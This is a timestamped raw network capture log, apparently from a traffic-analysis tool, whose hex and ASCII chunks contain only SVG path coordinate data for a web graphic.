                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12556INData Raw: 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 35 38 2c 32 35 31 2e 36 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 32 38 2c 32 34 32 2e 38 35 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: 2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M59.58,251.63a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M59.28,242.85a2.18,2.18,0,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12572INData Raw: 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 39 37 2c 33 30 33 2e 30 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d
                                                                                                                                                                                                                                                                          Data Ascii: 8,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M97,303.09a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12588INData Raw: 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 35 36 2c 31 31 37 2e 38 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 32 36 2c 31 30 39 2e 30 35 61 32 2e 31 38 2c 32 2e 31 38 2c
                                                                                                                                                                                                                                                                          Data Ascii: 6,2.86,2.86,0,0,1,3.67,0,2.67,2.67,0,0,1,.19,3.61"/><path class="cls-7" d="M117.56,117.83a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M117.26,109.05a2.18,2.18,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12604INData Raw: 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2e 33 31 2c 31 37 38 2e 30 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2c 31
                                                                                                                                                                                                                                                                          Data Ascii: 1.2,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M155.31,178.08a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.84,2.84,0,0,1,3.66,0,2.67,2.67,0,0,1,.2,3.62"/><path class="cls-7" d="M155,1
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12620INData Raw: 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 33 2e 30 37 2c 32 33 38 2e 33 32 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 32 2e 37 37 2c 32 32 39 2e 35 34 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c
                                                                                                                                                                                                                                                                          Data Ascii: 0,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M193.07,238.32a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M192.77,229.54a2.17,2.17,0,0,1-1,2.83,3.18,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12636INData Raw: 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 30 2e 38 33 2c 32 39 38 2e 35 37 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 33 30 2e 35
                                                                                                                                                                                                                                                                          Data Ascii: 1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M230.83,298.57a2.19,2.19,0,0,1-1,2.83,3.2,3.2,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M230.5
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12652INData Raw: 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 35 31 2e 33 35 2c 31 31 33 2e 33 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                                          Data Ascii: 3-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M251.35,113.31a2.17,2.17,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12668INData Raw: 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 38 39 2e 31 2c 31 37 33 2e 35 35 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                                                                                          Data Ascii: 1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M289.1,173.55a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66.05,2.66,2.66,0,0,1,.2,3.61"/><path class="
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12684INData Raw: 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 32 36 2e 38 36 2c 32 33 33 2e 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c
                                                                                                                                                                                                                                                                          Data Ascii: ,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M326.86,233.8a2.17,2.17,0,0,1-1,2.82,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12700INData Raw: 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 34 2e 36 32 2c 32 39 34 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61
                                                                                                                                                                                                                                                                          Data Ascii: 18,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M364.62,294a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"/><path cla
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12716INData Raw: 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 32 39 30 2e 36 34 2c 32 30 32 2e 33 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 32 39 30 2e 33 37 2c 31 39 34 2e 32 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: ass="cls-9" d="M290.64,202.37a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M290.37,194.29a2,2,0,0,1-.91,2.61,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12732INData Raw: 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 32 34 2e 38 33 2c 32 34 31 2e 36 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 32 34 2e 35 36 2c 32 33 33
                                                                                                                                                                                                                                                                          Data Ascii: 8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M324.83,241.65a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.88-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M324.56,233
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12748INData Raw: 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 35 39 2e 33 2c 32 38 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2e 30 35 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 35 39 2c 32 38 30 2e 39 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                                          Data Ascii: 38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M359.3,289a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.62,2.62,0,0,1,3.37.05,2.45,2.45,0,0,1,.18,3.32"/><path class="cls-9" d="M359,280.92a2,2,0,0,1-.91,2.61,2.93,2.93,0,0,1-
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12764INData Raw: 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 39 33 2e 34 39 2c 33 32 38 2e 32 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c
                                                                                                                                                                                                                                                                          Data Ascii: 1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M393.49,328.28a2,2,0,0,1-.9,2.6,2.92,2.92,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12780INData Raw: 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 38 2c 33 37 35 2e 36 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 37 2e 36 39 2c 33 36 37 2e 35 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33
                                                                                                                                                                                                                                                                          Data Ascii: ><path class="cls-9" d="M428,375.63a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"/><path class="cls-9" d="M427.69,367.56a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.3
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13196INData Raw: 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 36 2e 32 39 2c 31 38 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d
                                                                                                                                                                                                                                                                          Data Ascii: 3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M446.29,189a2,2,0,0,1-.9,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d=
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13212INData Raw: 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 30 2e 34 39 2c 32 32 38 2e 32 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                                          Data Ascii: ,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.47,2.47,0,0,1,.19,3.33"/><path class="cls-9" d="M480.49,228.29a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.46,2.46,0,0,1
